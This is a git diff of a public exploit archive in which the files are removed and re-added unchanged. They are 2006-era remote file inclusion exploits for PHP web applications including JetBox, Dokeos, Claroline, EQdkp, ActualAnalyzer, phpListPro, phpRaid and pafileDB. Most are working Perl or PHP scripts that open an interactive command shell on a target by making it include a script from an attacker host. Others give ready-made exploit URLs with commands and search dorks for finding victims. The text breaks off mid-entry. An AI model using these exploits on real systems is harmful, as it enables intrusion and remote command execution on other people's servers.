+$packet.="Cookie: fusion_visited=yes; ".$cookie." PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+echo "step 5 -> launch commands...\r\n";
+for ($i=0; $i<=count($mypaths)-1; $i++)
+{
+$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+  echo "Exploit succeeded...";
+  $temp=explode("56789",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+}
+//if you are here...
+echo "\r\nExploit failed...";
+?>
+
+# milw0rm.com [2006-05-07]
diff --git a/platforms/php/webapps/1761.pl b/platforms/php/webapps/1761.pl
index 1405f441d..e7ba27d0d 100755
--- a/platforms/php/webapps/1761.pl
+++ b/platforms/php/webapps/1761.pl
@@ -1,83 +1,83 @@
-#!/usr/bin/perl
-############
-# JetBox CMS Remote File Include
-# Exploit & Advisorie:  beford <xbefordx gmail com>
-#
-# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
-# 		perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
-#
-# cmd shell example: <? system($cmd); ?>
-# cmd variable: cmd;
-#
-#############
-# Description
-###########
-# Vendor: http://jetbox.streamedge.com/
-# The file jetbox/includes/phpdig/includes/config.php uses the variable 
-# relative_script_path in a include() function without being declared. 
-# This issue has already been fixed in phpdig, but jetbox still uses a 
-# vulnerable version.
-############
-# Vuln code
-############
-#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
-#    {include "$relative_script_path/locales/$phpdig_language-language.php";}
-#else
-#    {include "$relative_script_path/locales/en-language.php";}
-############
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
-head();
-while()
-{
-	print "[shell] \$";
-	while(<STDIN>)      {
-		$cmd=$_;
-		chomp($cmd);
-		if (!$cmd) {last;}  
-		$xpl = LWP::UserAgent->new() or die;
-		$req = HTTP::Request->new(GET =>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-		$res = $xpl->request($req);
-		$return = $res->content;
-		$return =~ tr/[\n]/[ê]/;
-		
-		if ($return =~/Error: HTTP request failed!/ ) {
-			print "\nInvalid path for phpshell\n";
-			exit;
-		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
-			print "\nComando Invalido, o no hubo respuesta\n\n";
-		}
-		if ($return =~ /(.*)/) {
-			$finreturn = $1;
-			$finreturn=~ tr/[ê]/[\n]/;
-			print "\r\n$finreturn\n\r";
-			last;
-		} else {
-			print "[shell] \$";
-		}
-
-	}
-
-} last;
-
-sub head()  { 
-	 print "\n============================================================================\r\n";
-	 print " JetBox CMS Remote File Include\r\n";
-	 print "============================================================================\r\n";
- }
- 
-sub usage() {
-	 head();
-	 print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
-	 print " <host> - Full Path : http://host/jetbox/ [remember the trailing slash noob]\r\n";
-	 print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
-	 print " <var> - var name used in phpshell : cmd  \r\n";
-	 exit();
- }
-
-# milw0rm.com [2006-05-07]
+#!/usr/bin/perl
+############
+# JetBox CMS Remote File Include
+# Exploit & Advisorie:  beford <xbefordx gmail com>
+#
+# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
+# 		perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
+#
+# cmd shell example: <? system($cmd); ?>
+# cmd variable: cmd;
+#
+#############
+# Description
+###########
+# Vendor: http://jetbox.streamedge.com/
+# The file jetbox/includes/phpdig/includes/config.php uses the variable 
+# relative_script_path in a include() function without being declared. 
+# This issue has already been fixed in phpdig, but jetbox still uses a 
+# vulnerable version.
+############
+# Vuln code
+############
+#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
+#    {include "$relative_script_path/locales/$phpdig_language-language.php";}
+#else
+#    {include "$relative_script_path/locales/en-language.php";}
+############
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
+head();
+while()
+{
+	print "[shell] \$";
+	while(<STDIN>)      {
+		$cmd=$_;
+		chomp($cmd);
+		if (!$cmd) {last;}  
+		$xpl = LWP::UserAgent->new() or die;
+		$req = HTTP::Request->new(GET =>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+		$res = $xpl->request($req);
+		$return = $res->content;
+		$return =~ tr/[\n]/[ê]/;
+		
+		if ($return =~/Error: HTTP request failed!/ ) {
+			print "\nInvalid path for phpshell\n";
+			exit;
+		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
+			print "\nComando Invalido, o no hubo respuesta\n\n";
+		}
+		if ($return =~ /(.*)/) {
+			$finreturn = $1;
+			$finreturn=~ tr/[ê]/[\n]/;
+			print "\r\n$finreturn\n\r";
+			last;
+		} else {
+			print "[shell] \$";
+		}
+
+	}
+
+} last;
+
+sub head()  { 
+	 print "\n============================================================================\r\n";
+	 print " JetBox CMS Remote File Include\r\n";
+	 print "============================================================================\r\n";
+ }
+ 
+sub usage() {
+	 head();
+	 print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
+	 print " <host> - Full Path : http://host/jetbox/ [remember the trailing slash noob]\r\n";
+	 print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
+	 print " <var> - var name used in phpshell : cmd  \r\n";
+	 exit();
+ }
+
+# milw0rm.com [2006-05-07]
diff --git a/platforms/php/webapps/1764.txt b/platforms/php/webapps/1764.txt
index 7752e9852..16e905d74 100755
--- a/platforms/php/webapps/1764.txt
+++ b/platforms/php/webapps/1764.txt
@@ -1,9 +1,9 @@
-Title: EQdkp <= 1.3.0 Remote File Inclusion
-URL: http://www.eqdkp.com/
-Dork: "powered by EQdkp"
-Author: OLiBekaS
-greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew
-
-Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-05-07]
+Title: EQdkp <= 1.3.0 Remote File Inclusion
+URL: http://www.eqdkp.com/
+Dork: "powered by EQdkp"
+Author: OLiBekaS
+greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew
+
+Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-05-07]
diff --git a/platforms/php/webapps/1765.pl b/platforms/php/webapps/1765.pl
index 26c9002cc..a81ca6c72 100755
--- a/platforms/php/webapps/1765.pl
+++ b/platforms/php/webapps/1765.pl
@@ -1,75 +1,75 @@
-#!/usr/bin/perl
-############
-# Dokeos Learning Management System 1.6.4 Remote File Include
-# Exploit & Advisorie:  beford <xbefordx gmail com>
-#
-# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
-# 		perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
-#
-# cmd shell example: <? system($cmd); ?>
-# cmd variable: cmd;
-#
-#############
-# Description
-#############
-# Vendor: http://www.dokeos.com/
-# The file dokeos/claroline/auth/ldap/authldap.php uses the variable 
-# includePath in a include() function without being declared. 
-# This issue has already been fixed in current claroline.net version, 
-# but dokeos still uses a  vulnerable version.
-############
-# Vulnerable code
-############
-# include ("$includePath/../auth/ldap/ldap_var.inc.php");
-############
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
-head();
-while() {
-	print "[shell] \$";
-	while(<STDIN>)      {
-		$cmd=$_;
-		chomp($cmd);
-		if (!$cmd) {last;}  
-		$xpl = LWP::UserAgent->new() or die;
-		$req = HTTP::Request->new(GET =>$Path.'claroline/auth/ldap/authldap.php?includePath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-		$res = $xpl->request($req);
-		$return = $res->content;
-		$return =~ tr/[\n]/[ê]/;
-		if ($return =~/Error: HTTP request failed!/ ) {
-			print "\nInvalid path for phpshell\n";
-			exit;
-		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
-			print "\nInvalid Command, error.\n\n";
-		}
-		if ($return =~ /(.*)/) {
-			$finreturn = $1;
-			$finreturn=~ tr/[ê]/[\n]/;
-			print "\r\n$finreturn\n\r";
-			last;
-		} else {
-			print "[shell] \$";
-		}
-	}
-} last;
-
-sub head()  { 
-	print "\n============================================================================\r\n";
-	print "  Dokeos Learning Management System Remote File Include\r\n";
-	print "============================================================================\r\n";
- }
- 
-sub usage() {
-	head();
-	print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
-	print " <host> - Full Path : http://host/dokeos/ \r\n";
-	print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
-	print " <var> - var name used in phpshell : cmd  \r\n\r\n";
-	exit();
- }
-
-# milw0rm.com [2006-05-08]
+#!/usr/bin/perl
+############
+# Dokeos Learning Management System 1.6.4 Remote File Include
+# Exploit & Advisorie:  beford <xbefordx gmail com>
+#
+# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
+# 		perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd
+#
+# cmd shell example: <? system($cmd); ?>
+# cmd variable: cmd;
+#
+#############
+# Description
+#############
+# Vendor: http://www.dokeos.com/
+# The file dokeos/claroline/auth/ldap/authldap.php uses the variable 
+# includePath in a include() function without being declared. 
+# This issue has already been fixed in current claroline.net version, 
+# but dokeos still uses a  vulnerable version.
+############
+# Vulnerable code
+############
+# include ("$includePath/../auth/ldap/ldap_var.inc.php");
+############
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
+head();
+while() {
+	print "[shell] \$";
+	while(<STDIN>)      {
+		$cmd=$_;
+		chomp($cmd);
+		if (!$cmd) {last;}  
+		$xpl = LWP::UserAgent->new() or die;
+		$req = HTTP::Request->new(GET =>$Path.'claroline/auth/ldap/authldap.php?includePath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+		$res = $xpl->request($req);
+		$return = $res->content;
+		$return =~ tr/[\n]/[ê]/;
+		if ($return =~/Error: HTTP request failed!/ ) {
+			print "\nInvalid path for phpshell\n";
+			exit;
+		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
+			print "\nInvalid Command, error.\n\n";
+		}
+		if ($return =~ /(.*)/) {
+			$finreturn = $1;
+			$finreturn=~ tr/[ê]/[\n]/;
+			print "\r\n$finreturn\n\r";
+			last;
+		} else {
+			print "[shell] \$";
+		}
+	}
+} last;
+
+sub head()  { 
+	print "\n============================================================================\r\n";
+	print "  Dokeos Learning Management System Remote File Include\r\n";
+	print "============================================================================\r\n";
+ }
+ 
+sub usage() {
+	head();
+	print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
+	print " <host> - Full Path : http://host/dokeos/ \r\n";
+	print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
+	print " <var> - var name used in phpshell : cmd  \r\n\r\n";
+	exit();
+ }
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1766.pl b/platforms/php/webapps/1766.pl
index 38e66b8e7..8e970f6bf 100755
--- a/platforms/php/webapps/1766.pl
+++ b/platforms/php/webapps/1766.pl
@@ -1,89 +1,89 @@
-#!/usr/bin/perl
-############
-# Claroline Open Source e-Learning  1.7.5 Remote File Include
-# Exploit & Advisorie:  beford <xbefordx gmail com>
-#
-# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
-# 		perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
-#
-# cmd shell example: <? system($cmd); ?>
-# cmd variable: cmd;
-#
-#############
-# Description
-#############
-# Vendor: http://www.claroline.net
-# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable 
-# clarolineRepositorySys in a include() function without being declared. 
-# There are other files vulnerable in the same folder, this exploit only
-# attacks ldap.inc.php
-#
-# There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
-# it uses the claro_CasLibPath in a include function but this is not being
-# declared either, so pwnt, RFI. Vendor was contacted through email, 
-# no response, so i just posted this here and on its forum.
-############
-# Vulnerable code (lda.inc.php)
-############
-# return require $clarolineRepositorySys.'/auth/extauth/extAuthProcess.inc.php';
-############
-# Vulnerable code (casProcess.inc.php)
-############
-#if (   ! isset($_SESSION['init_CasCheckinDone'] )
-#    || $logout
-#    || ( basename($_SERVER['SCRIPT_NAME']) == 'login.php' && isset($_REQUEST['authModeReq']) && $_REQUEST['authModeReq'] == 'CAS' )
-#    || isset($_REQUEST['fromCasServer']) )
-#{
-#    include_once $claro_CasLibPath;
-############
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
-head();
-while() {
-	print "[shell] \$";
-	while(<STDIN>)      {
-		$cmd=$_;
-		chomp($cmd);
-		if (!$cmd) {last;}  
-		$xpl = LWP::UserAgent->new() or die;
-		$req = HTTP::Request->new(GET =>$Path.'extauth/drivers/ldap.inc.php?clarolineRepositorySys='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-		$res = $xpl->request($req);
-		$return = $res->content;
-		$return =~ tr/[\n]/[ê]/;
-		if ($return =~/Error: HTTP request failed!/ ) {
-			print "\nInvalid path for phpshell\n";
-			exit;
-		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
-			print "\nInvalid Command, error.\n\n";
-		}
-		if ($return =~ /(.*)/) {
-			$finreturn = $1;
-			$finreturn=~ tr/[ê]/[\n]/;
-			print "\r\n$finreturn\n\r";
-			last;
-		} else {
-			print "[shell] \$";
-		}
-	}
-} last;
-
-sub head()  { 
-	print "\n============================================================================\r\n";
-	print "  Claroline Open Source e-Learning  1.7.5 Remote File Include\r\n";
-	print "============================================================================\r\n";
- }
- 
-sub usage() {
-	head();
-	print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
-	print " <host> - Full Path to Authentication Dir : http://host/claroline/auth/do \r\n";
-	print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
-	print " <var> - var name used in phpshell : cmd  \r\n\r\n";
-	exit();
- }
-
-# milw0rm.com [2006-05-08]
+#!/usr/bin/perl
+############
+# Claroline Open Source e-Learning  1.7.5 Remote File Include
+# Exploit & Advisorie:  beford <xbefordx gmail com>
+#
+# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
+# 		perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
+#
+# cmd shell example: <? system($cmd); ?>
+# cmd variable: cmd;
+#
+#############
+# Description
+#############
+# Vendor: http://www.claroline.net
+# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable 
+# clarolineRepositorySys in a include() function without being declared. 
+# There are other files vulnerable in the same folder, this exploit only
+# attacks ldap.inc.php
+#
+# There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
+# it uses the claro_CasLibPath in a include function but this is not being
+# declared either, so pwnt, RFI. Vendor was contacted through email, 
+# no response, so i just posted this here and on its forum.
+############
+# Vulnerable code (lda.inc.php)
+############
+# return require $clarolineRepositorySys.'/auth/extauth/extAuthProcess.inc.php';
+############
+# Vulnerable code (casProcess.inc.php)
+############
+#if (   ! isset($_SESSION['init_CasCheckinDone'] )
+#    || $logout
+#    || ( basename($_SERVER['SCRIPT_NAME']) == 'login.php' && isset($_REQUEST['authModeReq']) && $_REQUEST['authModeReq'] == 'CAS' )
+#    || isset($_REQUEST['fromCasServer']) )
+#{
+#    include_once $claro_CasLibPath;
+############
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
+head();
+while() {
+	print "[shell] \$";
+	while(<STDIN>)      {
+		$cmd=$_;
+		chomp($cmd);
+		if (!$cmd) {last;}  
+		$xpl = LWP::UserAgent->new() or die;
+		$req = HTTP::Request->new(GET =>$Path.'extauth/drivers/ldap.inc.php?clarolineRepositorySys='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+		$res = $xpl->request($req);
+		$return = $res->content;
+		$return =~ tr/[\n]/[ê]/;
+		if ($return =~/Error: HTTP request failed!/ ) {
+			print "\nInvalid path for phpshell\n";
+			exit;
+		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
+			print "\nInvalid Command, error.\n\n";
+		}
+		if ($return =~ /(.*)/) {
+			$finreturn = $1;
+			$finreturn=~ tr/[ê]/[\n]/;
+			print "\r\n$finreturn\n\r";
+			last;
+		} else {
+			print "[shell] \$";
+		}
+	}
+} last;
+
+sub head()  { 
+	print "\n============================================================================\r\n";
+	print "  Claroline Open Source e-Learning  1.7.5 Remote File Include\r\n";
+	print "============================================================================\r\n";
+ }
+ 
+sub usage() {
+	head();
+	print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
+	print " <host> - Full Path to Authentication Dir : http://host/claroline/auth/do \r\n";
+	print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
+	print " <var> - var name used in phpshell : cmd  \r\n\r\n";
+	exit();
+ }
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1767.txt b/platforms/php/webapps/1767.txt
index fffffeb71..0ff3313fa 100755
--- a/platforms/php/webapps/1767.txt
+++ b/platforms/php/webapps/1767.txt
@@ -1,19 +1,19 @@
-Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: ActualScripts
-URL: http://actualscripts.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "ActualScripts, Company. All rights reserved."
------------------------------------------------------------------
-
-Exploitation:
-
-/direct.php?rf=http://www.yourspace.com/yourscript.php?
-/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF
-
-# milw0rm.com [2006-05-08]
+Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: ActualScripts
+URL: http://actualscripts.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "ActualScripts, Company. All rights reserved."
+-----------------------------------------------------------------
+
+Exploitation:
+
+/direct.php?rf=http://www.yourspace.com/yourscript.php?
+/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1768.php b/platforms/php/webapps/1768.php
index 4a828a433..a1b371fa9 100755
--- a/platforms/php/webapps/1768.php
+++ b/platforms/php/webapps/1768.php
@@ -1,61 +1,61 @@
-<?php
-
-// No hard feelings ReZEN, I just post them when I get them. /str0ke
-
-/*
-ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN
-Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
-url:  http://www.xorcrew.net/ReZEN
-
-example:
-turl: http://www.target.com/path to actualanalyzer/direct.php?rf=
-hurl: http://www.pwn3d.com/evil.txt?
-
-*/
-
-$cmd = $_POST["cmd"];
-$turl = $_POST["turl"];
-$hurl = $_POST["hurl"];
-
-$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
-    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
-    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
-    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
-    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
-    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
-
-if (!isset($_POST['submit'])) 
-{
-
-echo $form;
-
-}else{
-
-$file = fopen ("test.txt", "w+");
-
-fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); 
-system(\"echo ++END++\"); ?>");
-fclose($file);
-
-$file = fopen ($turl.$hurl, "r");
-if (!$file) {
-    echo "<p>Unable to get output.\n";
-    exit;
-}
-
-echo $form;
-
-while (!feof ($file)) {
-    $line .= fgets ($file, 1024)."<br>";
-    }
-$tpos1 = strpos($line, "++BEGIN++");
-$tpos2 = strpos($line, "++END++");
-$tpos1 = $tpos1+strlen("++BEGIN++");
-$tpos2 = $tpos2-$tpos1;
-$output = substr($line, $tpos1, $tpos2);
-echo $output;
-
-}
-?>
-
-# milw0rm.com [2006-05-08]
+<?php
+
+// No hard feelings ReZEN, I just post them when I get them. /str0ke
+
+/*
+ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN
+Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
+url:  http://www.xorcrew.net/ReZEN
+
+example:
+turl: http://www.target.com/path to actualanalyzer/direct.php?rf=
+hurl: http://www.pwn3d.com/evil.txt?
+
+*/
+
+$cmd = $_POST["cmd"];
+$turl = $_POST["turl"];
+$hurl = $_POST["hurl"];
+
+$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
+    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
+    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
+    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
+    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
+    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
+
+if (!isset($_POST['submit'])) 
+{
+
+echo $form;
+
+}else{
+
+$file = fopen ("test.txt", "w+");
+
+fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); 
+system(\"echo ++END++\"); ?>");
+fclose($file);
+
+$file = fopen ($turl.$hurl, "r");
+if (!$file) {
+    echo "<p>Unable to get output.\n";
+    exit;
+}
+
+echo $form;
+
+while (!feof ($file)) {
+    $line .= fgets ($file, 1024)."<br>";
+    }
+$tpos1 = strpos($line, "++BEGIN++");
+$tpos2 = strpos($line, "++END++");
+$tpos1 = $tpos1+strlen("++BEGIN++");
+$tpos2 = $tpos2-$tpos1;
+$output = substr($line, $tpos1, $tpos2);
+echo $output;
+
+}
+?>
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1769.txt b/platforms/php/webapps/1769.txt
index 45868111e..dd21c2eb8 100755
--- a/platforms/php/webapps/1769.txt
+++ b/platforms/php/webapps/1769.txt
@@ -1,21 +1,21 @@
-Title: phpListPro <= 2.01 - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: SmartISoft
-URL: http://smartisoft.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "PHPListPro ©2001-2006 SmartISoft"
------------------------------------------------------------------
-
-Exploitation:
-
-/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
-/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
-/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
-/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls
-
-# milw0rm.com [2006-05-08]
+Title: phpListPro <= 2.01 - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: SmartISoft
+URL: http://smartisoft.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "PHPListPro ©2001-2006 SmartISoft"
+-----------------------------------------------------------------
+
+Exploitation:
+
+/config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
+/editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
+/in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF
+/addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls
+
+# milw0rm.com [2006-05-08]
diff --git a/platforms/php/webapps/1773.txt b/platforms/php/webapps/1773.txt
index 367f0c932..48efb1c2b 100755
--- a/platforms/php/webapps/1773.txt
+++ b/platforms/php/webapps/1773.txt
@@ -1,56 +1,56 @@
-# Kurdish Security Advisory
-# phpRaid Remote File Include [PHPBB/SMF] :}
-# "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan
-# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org
-
-# Script : phpRaid
-# Script Website : http://www.spiffyjr.com/
-# Version : phpRaid v2.9.5
-" v3.0.b1
-" v3.0.b2
-" v3.0.b3
-
-# Risk : High
-# Class : Remote
-# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D
-
-# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)
-
----------------------------------------------------------------------
-
-# cmd shell example:
-# cmd shell variable: ($_GET[cmd]);
-
-Vulnerable code : At first for phpbb portal :)
-
-// define our auth type
-define("AUTH","phpbb");
-
-// database connection
-global $user_group_table;
-$user_group_table = $phpbb_prefix . "user_group";
-
-// setup phpBB user integration
-define('IN_PHPBB', true);
-
-// set this as the path to your phpBB installation
-include($phpbb_root_path . 'extension.inc');
-include($phpbb_root_path . 'common.'.$phpEx);
-
------------------------------------------------------------------
-
-http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id
-
-http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a
-
-# SMF #
-
-// includes
-include($smf_root_path= . 'SSI.php');
------------------------------------------------------------------------
-
-http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id
-
-http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a
-
-# milw0rm.com [2006-05-09]
+# Kurdish Security Advisory
+# phpRaid Remote File Include [PHPBB/SMF] :}
+# "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan
+# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org
+
+# Script : phpRaid
+# Script Website : http://www.spiffyjr.com/
+# Version : phpRaid v2.9.5
+" v3.0.b1
+" v3.0.b2
+" v3.0.b3
+
+# Risk : High
+# Class : Remote
+# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D
+
+# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)
+
+---------------------------------------------------------------------
+
+# cmd shell example:
+# cmd shell variable: ($_GET[cmd]);
+
+Vulnerable code : At first for phpbb portal :)
+
+// define our auth type
+define("AUTH","phpbb");
+
+// database connection
+global $user_group_table;
+$user_group_table = $phpbb_prefix . "user_group";
+
+// setup phpBB user integration
+define('IN_PHPBB', true);
+
+// set this as the path to your phpBB installation
+include($phpbb_root_path . 'extension.inc');
+include($phpbb_root_path . 'common.'.$phpEx);
+
+-----------------------------------------------------------------
+
+http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id
+
+http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a
+
+# SMF #
+
+// includes
+include($smf_root_path= . 'SSI.php');
+-----------------------------------------------------------------------
+
+http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id
+
+http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a
+
+# milw0rm.com [2006-05-09]
diff --git a/platforms/php/webapps/1774.txt b/platforms/php/webapps/1774.txt
index d3722a421..c6bafd211 100755
--- a/platforms/php/webapps/1774.txt
+++ b/platforms/php/webapps/1774.txt
@@ -1,22 +1,22 @@
-# PafileDB Remote File Inclusion[phpBB]
-#
-# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com
-# Risk : High
-# Class : Remote
-# Script : pafileDB
-# Version : not specified
-
----------------------------------------------------------------------
-
-Vulnerable code :
-
-$link_language = 'lang_english';
-    include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
----------------------------------------------------------------------
-
-http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
-
-by Darkfire and IR4DEX GROUP
-Greetz: Smurf_RedHat :: V0lks
-
-# milw0rm.com [2006-05-09]
+# PafileDB Remote File Inclusion[phpBB]
+#
+# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com
+# Risk : High
+# Class : Remote
+# Script : pafileDB
+# Version : not specified
+
+---------------------------------------------------------------------
+
+Vulnerable code :
+
